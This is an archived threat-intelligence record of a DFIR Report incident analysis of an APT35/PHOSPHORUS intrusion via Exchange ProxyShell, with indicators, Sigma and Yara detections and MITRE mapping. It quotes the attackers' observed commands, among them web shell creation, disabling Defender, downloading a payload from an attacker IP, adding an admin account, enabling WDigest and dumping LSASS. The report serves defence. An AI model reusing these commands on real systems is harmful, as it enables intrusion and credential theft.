{
	"id": "c9d4bf4e-825c-4139-8250-34a922e2d6ee",
	"created_at": "2026-04-06T00:19:52.405486Z",
	"updated_at": "2026-04-10T03:34:00.37152Z",
	"deleted_at": null,
	"sha1_hash": "477081b009b74c4789b9fac8229e528fec9f3898",
	"title": "PHOSPHORUS Automates Initial Access Using ProxyShell",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1237387,
	"plain_text": "PHOSPHORUS Automates Initial Access Using ProxyShell\r\nBy editor\r\nPublished: 2022-03-21 · Archived: 2026-04-05 13:38:52 UTC\r\nIn December 2021, we observed an adversary exploiting the Microsoft Exchange ProxyShell vulnerabilities to gain initial\r\naccess and execute code via multiple web shells. The overlap of activities and tasks was remarkably similar to that observed\r\nin our previous report, “Exchange Exploit Leads to Domain Wide Ransomware”.\r\nIn this intrusion, we observed the initial exploitation of the ProxyShell vulnerabilities followed by some further post-exploitation activity, which included web shells, credential dumping, and specialized payloads. We assess that this activity\r\nwas related to PHOSPHORUS (aka UNC2448, NemesisKitten, and DEV-0270) due to the TTPs mirroring previously\r\nreported activity that was attributed to the group.\r\nCase Summary\r\nThe threat actors' activity occurred in two bursts within a 3-day time frame. As with our previous case, they started by\r\nuploading their web shell and disabling antivirus services.\r\nSoon after, they established two persistence methods. The first was through scheduled tasks, and the second was via a\r\nnewly created account. The account was then added to the “Remote Desktop Users” and local “Administrators” groups.\r\nLike in the prior case involving ProxyShell, we observed a file masquerading as dllhost.exe that exhibited similarities to a\r\nproxy tool called Fast Reverse Proxy (with modifications) downloaded from the same IP as observed in the prior case and\r\nconnecting to suspect domains.\r\nAfter establishing alternative ways of re-entering the targeted host, they enumerated the environment using Windows native\r\nprograms such as net and ipconfig. At the end of their first visit, they disabled LSA protection, enabled WDigest for access\r\nto plain text credentials later, dumped the LSASS process memory, and downloaded the results via the web shell.
\r\nAll of this activity occurred over a time frame of around 2 minutes, leading us to assess that the entire attack was likely\r\nscripted out. The user agent strings of python-requests/2.26.0 and python-urllib3/1.26.7 also point to the use of scripts.\r\nTwo days later, we saw the threat actors reappear. We expected them to pick up where they left off; however, they repeated\r\nall previous actions. Due to the similarity between the commands and the sequential order in which they ran, this is additional\r\nevidence that the threat actors employed automated scripts to execute these activities.\r\nNo further activity was observed as the threat actors were evicted from the network.\r\nServices\r\nWe offer multiple services including a Threat Feed service which tracks Command and Control frameworks such as Cobalt\r\nStrike, BazarLoader, Covenant, Metasploit, Empire, PoshC2, etc. More information on this service and others can be\r\nfound here.\r\nWe also have artifacts and IOCs available from this case such as pcaps, memory captures, files, event logs including\r\nSysmon, Kape packages, and more, under our Security Researcher and Organization services.\r\nTimeline\r\nhttps://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell\r\nPage 1 of 13\n\nAnalysis and reporting completed by @samaritan_o, @kostastsale, @svch0st and @RoxpinTeddy.\r\nAs similarly seen in our previous report Exchange Exploit Leads to Domain Wide Ransomware, this threat actor utilized the\r\nMicrosoft Exchange ProxyShell vulnerabilities; an exploit chain of 3 different CVEs:\r\nCVE-2021-34473\r\nCVE-2021-34523\r\nCVE-2021-31207\r\nWith the appropriate PowerShell logging available, we were able to recover the PowerShell cmdlets executed on the\r\nExchange server, which resulted in the creation of web shells on the host.\r\nOnce the threat actor had gained a valid privileged session using CVE-2021-34473 and CVE-2021-34523, they then ensured\r\nthe default Administrator account had the 
correct role for mailbox importing and exporting:\r\nNew-ManagementRoleAssignment -Role \"Mailbox Import Export\" -User \"administrator@\u003cREDACTED\u003e\"\r\nThe threat actor initiated a mailbox export that matched the search criteria of Subject -eq 'aspx_wkggiyvttmu' to a\r\nprovided location with the .aspx extension. While the file created is a legitimate .pst file, it contains plaintext web shell\r\ncode that is rendered by IIS when requested.\r\nNew-MailboxExportRequest -Mailbox \"administrator@\u003cREDACTED\u003e\" -FilePath \"\\\\localhost\\C$\\Program Files\\Microsoft\r\nIn an attempt to hide the actions taken, the actor removes the request just created:\r\nRemove-MailboxExportRequest -Confirm \"False\" -Force \"True\" -Identity \"77a883a7-470c-471c-a193-f4c54f263fde\"\r\nThis activity was then repeated approximately 2 days after the initial exploitation. As the actor had already achieved remote\r\nexecution by this point, there is a high likelihood that the exploitation of Exchange servers is automated. Below is the second\r\nweb shell created, which shares the same naming convention as the first.\r\nNew-MailboxExportRequest -Mailbox \"administrator@\u003cREDACTED\u003e\" -FilePath \"\\\\localhost\\c$\\inetpub\\wwwroot\\aspnet_\r\nExecution\r\nApproximately 20 seconds after the web shell aspx_wkggiyvttmu.aspx was created, a flurry of POST requests were sent to\r\nthe web shell.\r\nThe web shell followed a similar structure to that seen in previous cases. At least two parameters are sent in the POST request to\r\nthe web shell: delimiter, which defines what string is used to separate the response, and exec_code, which is the\r\ncommand to be run. 
The web shell had predefined functions for special actions:\r\nget – Get file from location on disk (additional dst POST parameter)\r\nput – Upload file to location (additional dst POST parameter)\r\nrun – Execute a list of commands separated by “;” using PowerShell.\r\nIf exec_code does not start with one of the above commands, it will simply attempt to run it with PowerShell.\r\nThe environment for this investigation had SSL inspection and PCAPs available for analysis, which allowed us to see the\r\ncommands being sent to the web shell itself. Below you can see an example of commands that were sent and the outputs\r\nthey returned in the response.\r\nThe actor first uploaded a file Wininet.xml, which is later used to create a scheduled task, to C:\\windows\\temp using the\r\nput command of the web shell. This was followed shortly by several commands to impair Windows Defender before\r\ndownloading and executing a fake dllhost.exe from 148.251.71[.]182.\r\nScheduled Task Commands:\r\nschtasks.exe /Create /F /XML C:\\windows\\temp\\Wininet.xml /tn '\\Microsoft\\Windows\\Maintenance\\Wininet'\r\nschtasks.exe /Run /tn '\\Microsoft\\Windows\\Maintenance\\Wininet'\r\nDefender Modification Command:\r\ntry {Set-MpPreference -DisableBehaviorMonitoring 1 -AsJob; Set-MpPreference -SevereThreatDefaultAction Allow -\r\nStart-Process powershell.exe {$file='c:\\windows\\dllhost.exe'; Invoke-WebRequest -Uri 'hXXp://148.251.71[.]182/\r\nThe scheduled task runs a batch script called Wininet.bat, which was also uploaded through the web shell. Wininet.bat\r\nsimply loops through the execution of the file dllhost.exe.\r\nThe file dllhost.exe is a golang binary. 
When executed, the binary was observed resolving the following domains:\r\napi.myip[.]com (for discovery)\r\ntcp443.msupdate[.]us\r\nkcp53.msupdate[.]us\r\nThe binary also spawns the following commands when executed:\r\ncmd /c wmic computersystem get domain\r\npowershell /c Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders\r\nThe binary has a low-confidence reference to FRP (FastReverseProxy), as the sample matches the closed-source Yara rule\r\nHKTL_PUA_FRP_FastReverseProxy_Oct21_1 (by Florian Roth); however, it does not behave in the same way as the open-source\r\ntool. This file also matches on an additional, more recent Yara rule,\r\nAPT_MAL_Go_FRP_CharmingKitten_Jan22_1, pointing to the file including some code from FRP but otherwise having\r\nbeen modified for use by this threat actor.\r\nPersistence\r\nThe threat actor utilized both account creation and scheduled tasks to gain persistence in the environment.\r\nNew account creation\r\nDuring the first activity, we observed the use of the user.exe executable, which ran the following PowerShell command:\r\npowershell.exe /c net user /add DefaultAccount P@ssw0rd123412; net user DefaultAccount /active:yes; net user D\r\nThe first thing they did was make a new user named DefaultAccount with the password P@ssw0rd123412. They then\r\nactivated the account and changed the password (P@ssw0rd12341234) for the second time. 
Finally, the commands added the\r\nnew account to the Administrators group and Remote Desktop Users group.\r\nThe threat actors ran the same command again two days later:\r\npowershell.exe /c net user /add DefaultAccount P@ssw0rd123412; net user DefaultAccount /active:yes; net user D\r\nDue to the close proximity between executed commands, we assess that the threat actors used tools to automate the\r\nexecution and discovery phases of this attack.\r\nScheduled task\r\nAs previously noted, we discovered the creation of a scheduled task from a .xml template that was copied to the server via\r\nthe web shell.\r\nBelow, we can observe the content of wininet.xml:\r\nThe following commands were then run to initiate the task and to achieve persistence:\r\nschtasks.exe /Create /F /XML %wintmp%\\Wininet.xml /tn '\\Microsoft\\Windows\\Maintenance\\Wininet'\r\nschtasks.exe /Run /tn '\\Microsoft\\Windows\\Maintenance\\Wininet'\r\nPrivilege Escalation\r\nThe scheduled task created by the web shell was set to use the principal SID “S-1-5-18”, or SYSTEM.\r\n\u003cUserId\u003eS-1-5-18\u003c/UserId\u003e\r\nDefense Evasion\r\nUsing PowerShell, the threat actors issued several commands to impair Windows Defender, including:\r\nWindows Defender Behavior Monitoring was disabled.\r\nThe Severe Threat default action was set to ‘Allow’.\r\nReal-time Monitoring was disabled.\r\nThe ‘C:\\Windows’ path was excluded from scheduled and real-time scanning.\r\ntry {Set-MpPreference -DisableBehaviorMonitoring 1 -AsJob; Set-MpPreference -SevereThreatDefaultAction Allow -\r\nA rule was added to the Windows Firewall to allow remote RDP traffic.\r\n\"netsh\" advfirewall firewall add rule name=\"Terminal Server\" dir=in action=allow protocol=TCP localport=3389\r\nRemote Desktop Services was 
started.\r\n\"net\" start TermService\r\nThe threat actor enabled WDigest authentication. This causes credentials to be stored in plaintext on future logons.\r\n\"reg\" add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /\r\nLSA protection was disabled.\r\n\"reg\" add HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA /v RunAsPPL /t REG_DWORD /d 0 /f\r\nCredential Access\r\nThe threat actor created a process memory dump from LSASS.exe. In this case, they created a “minidump” using the\r\nLOLBIN comsvcs.dll. This was dropped to disk as ssasl.pmd (lsass.dmp reversed) and then zipped before exfiltration.\r\n\"powershell.exe\" /c Remove-Item -Path C:\\windows\\temp\\ssasl.pmd -Force -ErrorAction Ignore; rundll32.exe C:\\wi\r\nDiscovery\r\nThe threat actors used native Windows binaries to enumerate the exploited server in an automated fashion. They executed\r\ncommands such as:\r\nnet.exe user\r\nipconfig.exe /all\r\npowershell.exe (multiple commands)\r\nquser.exe\r\nThese discovery tasks, like the rest of the activity observed from this threat actor, were executed via the web shell.\r\nThey used the PowerShell cmdlet Get-WmiObject to collect the name and IP address of the domain controller.\r\nGet-WMIObject Win32_NTDomain | findstr DomainController\r\nAdditionally, we saw the threat actors retrieving an email address from the compromised Exchange server using the below\r\ncommand. This was likely done as a test. 
\r\nAdd-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;Get-Recipient | Select Name -ExpandProperty Emai\r\nCollection\r\nWhile they had access to the Exchange server, we observed no attempts to export or access user mailboxes.\r\nCommand and Control\r\nAs we saw in the execution section, dllhost.exe was used to access the below domains for C2, which we believe was\r\nusing a variation of FRP.\r\ntcp443.msupdate[.]us (107.173.231[.]114)\r\nkcp53.msupdate[.]us (107.173.231[.]114)\r\nThis C2 channel was not used very much, as most activity was done through the web shell.\r\nExfiltration\r\nThe only data successfully exfiltrated from the environment was the archive containing the LSASS dump.\r\nHere you can see the threat actor using the web shell command to extract it:\r\nImpact\r\nIn this case, there was no further impact to the environment before the threat actors were evicted. Due to our previous report\r\nand OSINT research, we believe with medium to high confidence that this intrusion would have ended in ransomware.\r\nIndicators\r\nAll artifacts including web shells, files, IPs, etc. 
were added to our services in December.\r\nNetwork\r\nipv4: 148.251.71[.]182\r\nipv4: 107.173.231[.]114\r\ndomain: tcp443.msupdate[.]us\r\ndomain: kcp53.msupdate[.]us\r\nuseragent: python-urllib3/1.26.7\r\nuseragent: python-requests/2.26.0\r\nFile\r\naspx_dyukbdcxjfi.aspx\r\n1a5ad24a6880eea807078375d6461f58\r\nda2470c3990ea0862a79149c6036388498da83cd\r\n84f77fc4281ebf94ab4897a48aa5dd7092cc0b7c78235965637eeef0908fb6c7\r\ndhvqx.aspx\r\nb2fde6dc7bd1e04ce601f57805de415b\r\n4d243969b54b9b80c1d26e0801a6e7e46d2ef03e\r\nc5aae30675cc1fd83fd25330cec245af744b878a8f86626d98b8e7fcd3e970f8\r\ndllhost.exe\r\n9a3703f9c532ae2ec3025840fa449d4e\r\n8ece87086e8b5aba0d1cc4ec3804bf74e0b45bee\r\n1604e69d17c0f26182a3e3ff65694a49450aafd56a7e8b21697a932409dfd81e\r\nwininet.bat\r\n5f098b55f94f5a448ca28904a57c0e58\r\n27102b416ef5df186bd8b35190c2a4cc4e2fbf37\r\n668ec78916bab79e707dc99fdecfa10f3c87ee36d4dee6e3502d1f5663a428a0\r\nwininet.xml\r\nd2f4647a3749d30a35d5a8faff41765e\r\n0f676bc786db3c44cac4d2d22070fb514b4cb64c\r\n559d4abe3a6f6c93fc9eae24672a49781af140c43d491a757c8e975507b4032e\r\nuser.exe\r\nf0be699c8aafc41b25a8fc0974cc4582\r\n6bae2d45bbd8c4b0a59ba08892692fe86e596154\r\n7b5fbbd90eab5bee6f3c25aa3c2762104e219f96501ad6a4463e25e6001eb00b\r\ntask_update.exe\r\ncacb64bdf648444e66c82f5ce61caf4b\r\n3a6431169073d61748829c31a9da29123dd61da8\r\n12c6da07da24edba13650cd324b2ad04d0a0526bb4e853dee03c094075ff6d1a\r\nDetections\r\nNetwork\r\nET INFO User-Agent (python-requests) Inbound to Webserver\r\nET INFO Generic HTTP EXE Upload Inbound\r\nET INFO Generic HTTP EXE Upload Outbound\r\nGPL ATTACK_RESPONSE command completed\r\nET ATTACK_RESPONSE Net User Command Response\r\nET WEB_SERVER WebShell Generic - netsh firewall\r\nSigma\r\nCustom rules\r\nExchange Webshell creation – https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/exchange_webshell_creation\r\nDefaultAccount Usage – 
https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/defaultaccount_usage\r\nSigmaHQ rules\r\nLocal Accounts Discovery –\r\nhttps://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_local_system_owner_acco\r\nLsass Memory Dump via Comsvcs DLL –\r\nhttps://github.com/SigmaHQ/sigma/blob/b81839e3ce507df925d6e583e569e1ac3a3894ab/rules/windows/process_access/sysmon_lsass_dump_comsvcs_d\r\nNet.exe Execution –\r\nhttps://github.com/SigmaHQ/sigma/blob/777d218adc789b7f1b146701793e78799324d87d/rules/windows/process_creation/win_susp_net_execution.yml\r\nNet-exe User Account Creation –\r\nhttps://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_net_user_add.yml\r\nNetsh Port or Application Allowed –\r\nhttps://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_netsh_fw_add.yml\r\nNetsh RDP Port Opening –\r\nhttps://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_netsh_allow_port_rdp.yml\r\nNon Interactive PowerShell –\r\nhttps://github.com/SigmaHQ/sigma/blob/1425ede905514b7dbf3c457561aaf2ff27274724/rules/windows/process_creation/win_non_interactive_powershe\r\nPowershell Defender Exclusion –\r\nhttps://github.com/SigmaHQ/sigma/blob/682e0458a336c3a6e93b18f7e972e1d67ef01598/rules/windows/process_creation/win_powershell_defender_exc\r\nPowerShell Get-Process LSASS –\r\nhttps://github.com/SigmaHQ/sigma/blob/1ff5e226ad8bed34916c16ccc77ba281ca3203ae/rules/windows/process_creation/win_susp_powershell_getproce\r\nProcess Dump via Comsvcs DLL –\r\nhttps://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_susp_comsvcs_procdump.\r\nQuick Execution of a Series of Suspicious Commands 
–\r\nhttps://github.com/SigmaHQ/sigma/blob/ed4e771700681b36eb8dd74a13dffc94c857bb46/rules/windows/process_creation/win_multiple_suspicious_cli.y\r\nRare Scheduled Task Creations –\r\nhttps://github.com/SigmaHQ/sigma/blob/04f72b9e78f196544f8f1331b4d9158df34d7ecf/rules/windows/other/taskscheduler/win_rare_schtask_creation.ym\r\nService Execution –\r\nhttps://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_service_execution.yml\r\nShells Spawned by Web Servers –\r\nhttps://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_webshell_spawn.yml\r\nSuspicious PowerShell Parent Process –\r\nhttps://github.com/SigmaHQ/sigma/blob/6f5271275e9ac22be9ded8b9252bce064e524153/rules/windows/process_creation/win_susp_powershell_parent_\r\nSuspicious Script Execution From Temp Folder –\r\nhttps://github.com/SigmaHQ/sigma/blob/ed4e771700681b36eb8dd74a13dffc94c857bb46/rules/windows/process_creation/win_susp_script_exec_from_te\r\nWdigest Enable UseLogonCredential –\r\nhttps://github.com/SigmaHQ/sigma/blob/503df469687fe4d14d2119a95723485d079ec0d9/rules/windows/registry_event/sysmon_wdigest_enable_uselogo\r\nWebshell Detection With Command Line Keywords –\r\nhttps://github.com/SigmaHQ/sigma/blob/1cfca93354d25e458db40f8d48403602b46bbf03/rules/windows/process_creation/win_webshell_detection.yml\r\nWindows Defender Real-Time Protection Disabled –\r\nhttps://github.com/SigmaHQ/sigma/blob/57cdfd261266b81255e330723f4adf270fc4c4f8/rules/windows/registry_event/registry_event_defender_realtime_\r\nWindows Defender Threat Detection Disabled –\r\nhttps://github.com/SigmaHQ/sigma/blob/57cdfd261266b81255e330723f4adf270fc4c4f8/rules/windows/registry_event/registry_event_defender_disabled\r\nWindows Shell Spawning Suspicious Program –\r\nhttps://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_shell_spawn_susp_program\r\nWindows 
Suspicious Use Of Web Request in CommandLine –\r\nhttps://github.com/SigmaHQ/sigma/blob/98d7380a40d503ffd225420f7318b79d9f5097b8/rules/windows/process_creation/process_creation_susp_web_re\r\nWindows Webshell Creation –\r\nhttps://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/file_event/sysmon_webshell_creation_detect.ym\r\nYara\r\nrule files_dhvqx {\r\n meta:\r\n description = \"9893_files - file dhvqx.aspx\"\r\n author = \"TheDFIRReport\"\r\n reference = \"https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/\"\r\n date = \"2022-03-21\"\r\n hash1 = \"c5aae30675cc1fd83fd25330cec245af744b878a8f86626d98b8e7fcd3e970f8\"\r\n strings:\n $s1 = \"eval(Request['exec_code'],'unsafe');Response.End;\" fullword ascii\n $s2 = \"6\n\ncondition:\n uint16(0) == 0x5a4d and filesize \u003c 300KB and\n 1 of ($x*) and 4 of them\n}\nrule task_update {\n meta:\n description = \"9893_files - file task_update.exe\"\n author = \"TheDFIRReport\"\n reference = \"https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/\"\n date = \"2022-03-21\"\n hash1 = \"12c6da07da24edba13650cd324b2ad04d0a0526bb4e853dee03c094075ff6d1a\"\n strings:\n $x1 = \"  \u003c/\n $s3 = \"-InitOnceExecuteOnce\" fullword ascii\n $s4 = \"\u003e\n\nrule _user_task_update_0 {\r\n meta:\r\n description = \"9893_files - from files user.exe, task_update.exe\"\r\n author = \"TheDFIRReport\"\r\n reference = \"https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/\"\r\n date = \"2022-03-21\"\r\n hash1 = \"7b5fbbd90eab5bee6f3c25aa3c2762104e219f96501ad6a4463e25e6001eb00b\"\r\n hash2 = \"12c6da07da24edba13650cd324b2ad04d0a0526bb4e853dee03c094075ff6d1a\"\r\n strings:\r\n $s1 = \"-InitOnceExecuteOnce\" fullword ascii\r\n $s2 = \"PB_GadgetStack_%I64i\" fullword ascii\r\n $s3 = \"PB_DropAccept\" fullword 
ascii\r\n $s4 = \"PB_PostEventMessage\" fullword ascii\r\n $s5 = \"PB_WindowID\" fullword ascii\r\n $s6 = \"?GetLongPathNameA\" fullword ascii\r\n $s7 = \"Memory page error\" fullword ascii\r\n $s8 = \"PPPPPPH\" fullword ascii\r\n $s9 = \"YZAXAYH\" fullword ascii\r\n $s10 = \"%d:%I64d:%I64d:%I64d\" fullword ascii\r\n $s11 = \"PYZAXAYH\" fullword ascii\r\n $s12 = \"PB_MDI_Gadget\" fullword ascii\r\n $s13 = \"PostEventClass\" fullword ascii\r\n $s14 = \"t$hYZAXAYH\" fullword ascii\r\n $s15 = \"$YZAXAYH\" fullword ascii\r\n $s16 = \"Floating-point underflow (exponent too small)\" fullword ascii\r\n $s17 = \"Inexact floating-point result\" fullword ascii\r\n $s18 = \"Single step trap\" fullword ascii\r\n $s19 = \"Division by zero (floating-point)\" fullword ascii\r\n $s20 = \"tmHcI(H\" fullword ascii\r\n condition:\r\n ( uint16(0) == 0x5a4d and filesize \u003c 300KB and ( 8 of them )\r\n ) or ( all of them )\r\n}\r\nMITRE\r\nExploit Public-Facing Application – T1190\r\nOS Credential Dumping – T1003\r\nAccount Manipulation – T1098\r\nValid Accounts – T1078\r\nIngress Tool Transfer – T1105\r\nMatch Legitimate Name or Location – T1036.005\r\nWindows Service – T1543.003\r\nWeb Shell – T1505.003\r\nSystem Information Discovery – T1082\r\nSystem Network Configuration Discovery – T1016\r\nSystem Owner/User Discovery – T1033\r\nWindows Command Shell – T1059.003\r\nInternal case #9893\r\nSource: https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell"
	],
	"report_names": [
		"apt35-automates-initial-access-using-proxyshell"
	],
	"threat_actors": [
		{
			"id": "d8af157e-741b-4933-bb4a-b78490951d97",
			"created_at": "2023-01-06T13:46:38.748929Z",
			"updated_at": "2026-04-10T02:00:03.087356Z",
			"deleted_at": null,
			"main_name": "APT35",
			"aliases": [
				"COBALT MIRAGE",
				"Agent Serpens",
				"Newscaster Team",
				"Magic Hound",
				"G0059",
				"Phosphorus",
				"Mint Sandstorm",
				"TunnelVision"
			],
			"source_name": "MISPGALAXY:APT35",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6b4a82e8-21f1-4bc7-84cf-e27334998b48",
			"created_at": "2022-10-25T16:07:23.84296Z",
			"updated_at": "2026-04-10T02:00:04.762229Z",
			"deleted_at": null,
			"main_name": "DEV-0270",
			"aliases": [
				"DEV-0270",
				"DireFate",
				"Lord Nemesis",
				"Nemesis Kitten",
				"Yellow Dev 23",
				"Yellow Dev 24"
			],
			"source_name": "ETDA:DEV-0270",
			"tools": [
				"Impacket",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"WmiExec"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "eaef3218-1f8c-4767-b1ff-da7a6662acc0",
			"created_at": "2023-03-04T02:01:54.110909Z",
			"updated_at": "2026-04-10T02:00:03.359871Z",
			"deleted_at": null,
			"main_name": "DEV-0270",
			"aliases": [
				"Nemesis Kitten",
				"Storm-0270"
			],
			"source_name": "MISPGALAXY:DEV-0270",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4",
			"created_at": "2022-10-25T15:50:23.808974Z",
			"updated_at": "2026-04-10T02:00:05.291959Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"Magic Hound",
				"TA453",
				"COBALT ILLUSION",
				"Charming Kitten",
				"ITG18",
				"Phosphorus",
				"APT35",
				"Mint Sandstorm"
			],
			"source_name": "MITRE:Magic Hound",
			"tools": [
				"Impacket",
				"CharmPower",
				"FRP",
				"Mimikatz",
				"Systeminfo",
				"ipconfig",
				"netsh",
				"PowerLess",
				"Pupy",
				"DownPaper",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03",
			"created_at": "2025-08-07T02:03:24.746965Z",
			"updated_at": "2026-04-10T02:00:03.640335Z",
			"deleted_at": null,
			"main_name": "COBALT ILLUSION",
			"aliases": [
				"APT35 ",
				"APT42 ",
				"Agent Serpens Palo Alto",
				"Charming Kitten ",
				"CharmingCypress ",
				"Educated Manticore Checkpoint",
				"ITG18 ",
				"Magic Hound ",
				"Mint Sandstorm sub-group ",
				"NewsBeef ",
				"Newscaster ",
				"PHOSPHORUS sub-group ",
				"TA453 ",
				"UNC788 ",
				"Yellow Garuda "
			],
			"source_name": "Secureworks:COBALT ILLUSION",
			"tools": [
				"Browser Exploitation Framework (BeEF)",
				"MagicHound Toolset",
				"PupyRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2bfa2cf4-e4ce-4599-ab28-d644208703d7",
			"created_at": "2025-08-07T02:03:24.764883Z",
			"updated_at": "2026-04-10T02:00:03.611225Z",
			"deleted_at": null,
			"main_name": "COBALT MIRAGE",
			"aliases": [
				"DEV-0270 ",
				"Nemesis Kitten ",
				"PHOSPHORUS ",
				"TunnelVision ",
				"UNC2448 "
			],
			"source_name": "Secureworks:COBALT MIRAGE",
			"tools": [
				"BitLocker",
				"Custom powershell scripts",
				"DiskCryptor",
				"Drokbk",
				"FRPC",
				"Fast Reverse Proxy (FRP)",
				"Impacket wmiexec",
				"Ngrok",
				"Plink",
				"PowerLessCLR",
				"TunnelFish"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f",
			"created_at": "2022-10-25T16:07:23.83826Z",
			"updated_at": "2026-04-10T02:00:04.761303Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"APT 35",
				"Agent Serpens",
				"Ballistic Bobcat",
				"Charming Kitten",
				"CharmingCypress",
				"Cobalt Illusion",
				"Cobalt Mirage",
				"Educated Manticore",
				"G0058",
				"G0059",
				"Magic Hound",
				"Mint Sandstorm",
				"Operation BadBlood",
				"Operation Sponsoring Access",
				"Operation SpoofedScholars",
				"Operation Thamar Reservoir",
				"Phosphorus",
				"TA453",
				"TEMP.Beanie",
				"Tarh Andishan",
				"Timberworm",
				"TunnelVision",
				"UNC788",
				"Yellow Garuda"
			],
			"source_name": "ETDA:Magic Hound",
			"tools": [
				"7-Zip",
				"AnvilEcho",
				"BASICSTAR",
				"CORRUPT KITTEN",
				"CWoolger",
				"CharmPower",
				"ChromeHistoryView",
				"CommandCam",
				"DistTrack",
				"DownPaper",
				"FRP",
				"Fast Reverse Proxy",
				"FireMalv",
				"Ghambar",
				"GoProxy",
				"GorjolEcho",
				"HYPERSCRAPE",
				"Havij",
				"MPK",
				"MPKBot",
				"Matryoshka",
				"Matryoshka RAT",
				"MediaPl",
				"Mimikatz",
				"MischiefTut",
				"NETWoolger",
				"NOKNOK",
				"PINEFLOWER",
				"POWERSTAR",
				"PowerLess Backdoor",
				"PsList",
				"Pupy",
				"PupyRAT",
				"SNAILPROXY",
				"Shamoon",
				"TDTESS",
				"WinRAR",
				"WoolenLogger",
				"Woolger",
				"pupy",
				"sqlmap"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434792,
	"ts_updated_at": 1775792040,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/477081b009b74c4789b9fac8229e528fec9f3898.pdf",
		"text": "https://archive.orkl.eu/477081b009b74c4789b9fac8229e528fec9f3898.txt",
		"img": "https://archive.orkl.eu/477081b009b74c4789b9fac8229e528fec9f3898.jpg"
	}
}